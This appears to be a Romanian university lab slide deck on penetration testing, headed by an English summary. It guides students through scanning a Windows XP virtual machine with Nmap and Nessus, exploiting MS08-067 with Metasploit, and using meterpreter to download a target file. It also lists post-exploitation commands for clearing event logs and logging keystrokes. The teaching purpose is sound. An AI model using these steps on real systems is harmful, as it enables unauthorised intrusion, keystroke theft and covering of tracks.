The document outlines a laboratory exercise on computer network security, specifically demonstrating a cyber attack using open-source tools to exploit vulnerabilities in a target machine running Windows XP. It details steps like reconnaissance, gaining access, privilege escalation, and maintaining access through the use of tools like Nmap, Nessus, and Metasploit. Ethical hacking is emphasized, focusing on identifying vulnerabilities for corrective measures without destructive actions.

1. Securitatea Retelelor de Calculatoare Lucrare de laborator Adrian Furtun ă M.Sc. C|EH [email_address]

2. Scopul lucrarii Exemplificarea unui atac informatic folosind tool-uri open-source: Descarcati local fisierul secrets.txt aflat pe desktop-ul statiei victima exploatand o vulnerabilitate a acesteia. Parcurgerea etapelor unui atac*: Recunoastere - Scanare si Enumerare - Nmap, Nessus Obtinerea accesului - Metasploit Escalarea privilegiilor - Mentinerea accesului - Stergerea urmelor si instalarea de backdoors - * conform documentatiei pentru certificarea Certified Ethical Hacker (ECCouncil)

3. Pregatirea Laboratorului (30 min) Descarcati si instalati urmatoarele tool-uri: nmap-5.00-setup.exe ( http:// nmap.org ) Nessus-4.0.2-i386.msi ( http:// www.nessus.org ) framework-3.3.3.exe ( http:// www.metasploit.org ) Update Nessus plugins “ Obtain an activation code” (home feed) “ Register” (dupa inregistrare incepe automat update-ul plugin-urilor) Pregatirea victimei: Descarcati local si dezarhivati arhiva: winxp_SP2_strip.zip Porniti masina virtuala: Windows XP Professional.vmx Autentificare: (user: user , pass: user ) Verificare conectivitate (private network Host  Guest): ping Host  Guest

4. Disclaimer Ethical Hacking / Penetration Testing Actiuni similare unui atacator/hacker Scop etic: Descoperirea vulnerabilitatilor Propunerea de masuri corective Fara actiuni distructive/neaprobate Activitate proactiva, preventiva

5. Ce vom exersa… Scanare cu Nmap Porturi deschise Versiunile serviciilor expuse Versiunea sistemului de operare Scanare cu Nessus Cautare automata de vulnerabilitati pentru serviciile gasite anterior Exploatarea unei vulnerabilitati folosind Metasploit Obtinerea accesului la sistemul tinta

6. Tinta atacului (victima) Sistem de operare: ????? Servicii expuse: ????? Vulnerabilitati: ????? Masina virtuala (vmware) Firewall ON/OFF Fara antivirus

7. Scanare folosind Nmap (1) http:// insecure.org nmap –h [fragmente] HOST DISCOVERY: -sP: Ping Scan - go no further than determining if host is online -PN: Treat all hosts as online -- skip host discovery -PS/PA/PU/PY[portlist]: TCP SYN/ACK, UDP or SCTP discovery to given ports -n/-R: Never do DNS resolution/Always resolve [default: sometimes] SCAN TECHNIQUES: -sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans -sU: UDP Scan -sN/sF/sX: TCP Null, FIN, and Xmas scans PORT SPECIFICATION AND SCAN ORDER: -p <port ranges>: Only scan specified ports -F: Fast mode - Scan fewer ports than the default scan SERVICE/VERSION DETECTION: -sV: Probe open ports to determine service/version info SCRIPT SCAN: -sC: equivalent to --script=default --script=<Lua scripts>: <Lua scripts> is a comma separated list of directories, script-files or script-categories OS DETECTION: -O: Enable OS detection OUTPUT: -oN/-oX/-oS/-oG <file>: Output scan in normal, XML, s|<rIpt kIddi3, and Grepable format, respectively, to the given filename.

8. Scanare folosind Nmap (2) nmap -sS -sV -O -F -n 10.0.40.69

9. Scanare folosind Nmap (2) nmap -sS -sV -O -F -n 10.0.40.69 Starting Nmap 5.10BETA1 ( http://nmap.org ) at 2010-01-04 17:20 GTB Standard Time Nmap scan report for 10.254.40.69 Host is up (0.00011s latency). Not shown: 98 filtered ports PORT STATE SERVICE VERSION 139/tcp open netbios-ssn 445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds MAC Address: 00:0C:29:86:DF:91 (VMware) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running (JUST GUESSING) : Microsoft Windows XP|2000|2003 (97%) Aggressive OS guesses: Microsoft Windows XP SP2 (97%), Microsoft Windows XP SP3 (94%), Microsoft Windows 2000 SP4 or Windows XP SP2 or SP3 (94%), Microsoft Windows Server 2003 SP1 or SP2 (93%), Microsoft Windows XP (93%), Microsoft Windows XP SP2 or SP3 (93%), Microsoft Windows 2003 Small Business Server (92%), Microsoft Windows XP Professional SP2 (92%), Microsoft Windows Server 2003 SP2 (92%), Microsoft Windows 2000 SP4 (91%) No exact OS matches for host (test conditions non-ideal). Network Distance: 1 hop Service Info: OS: Windows OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 13.52 seconds

10. Scanare folosind Nessus (1) http:// www.nessus.org Nessus Server Manager  Start Nessus Server Nessus Client Connect - clientul se conecteaza la server + Networks to scan - se specifica IPul statiei tinta + Select a scan policy – se creaza o noua politica de scanare Plugin Selection  Disable All Plugin Selection  Windows (activeaza numai plugin-urile pentru Windows) Scan Now - incepe scanarea Export - salveaza raportul rezultat

11. Scanare folosind Nessus (2) http:// www.nessus.org

12. Obtinerea accesului – Metasploit (1) Arhitectura Metasploit Metasploit Console, Metasploit Web Modules Exploits - exploateaza o vulnerabilitate si livreaza un payload Auxiliaries – port scanning, dos, fuzzing, etc Payloads - incapsuleaza cod arbitrar (shellcode) care este executat in urma unui exploit Nops – genereaza instructiuni de tip NOP cu dimensiune arbitrara Tutorial: http://www.offensive-security.com/metasploit-unleashed /

13. Obtinerea accesului – Metasploit (2) http:// www.metasploit.org Exploatam vulnerabilitatea ms08-067 (Conficker/Kido/Downadup) http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspx Start Metasploit Web Exploits -> Search [ms08-067] Set TARGET - Windows XP SP2 English Set PAYLOAD - windows/meterpreter/bind_tcp (sau reverse_tcp) Set OPTIONS - RHOST (adresa IP a victimei) Exploit

14. Obtinerea accesului – Metasploit (3) http:// www.metasploit.org

15. Obtinerea accesului – Metasploit (4) http:// www.metasploit.org Stdapi: System Commands Command Description ------- ----------- clearev Clear the event log execute Execute a command kill Terminate a process ps List running processes reboot Reboots the remote computer shell Drop into a system command shell sysinfo Gets information about the remote system, such as OS Stdapi: User interface Commands Command Description ------- ----------- keyscan_dump Dump they keystroke buffer keyscan_start Start capturing keystrokes keyscan_stop Stop capturing keystrokes Meterpreter help [fragmente] Stdapi: File system Commands Command Description ------- ----------- cat Read the contents of a file to the screen cd Change directory del Delete the specified file download Download a file or directory edit Edit a file getlwd Print local working directory getwd Print working directory lcd Change local working directory lpwd Print local working directory ls List files mkdir Make directory pwd Print working directory rm Delete the specified file rmdir Remove directory upload Upload a file or directory

16. Indeplinirea obiectivului exercitiului Descarcati local fisierul secrets.txt aflat pe desktop-ul statiei victima exploatand o vulnerabilitate a acesteia.. Meterpreter: pwd cd Desktop ls download

17. The End Va multumesc! Adrian Furtunã M.Sc. C|EH [email_address] ? I N T R E B A R I ?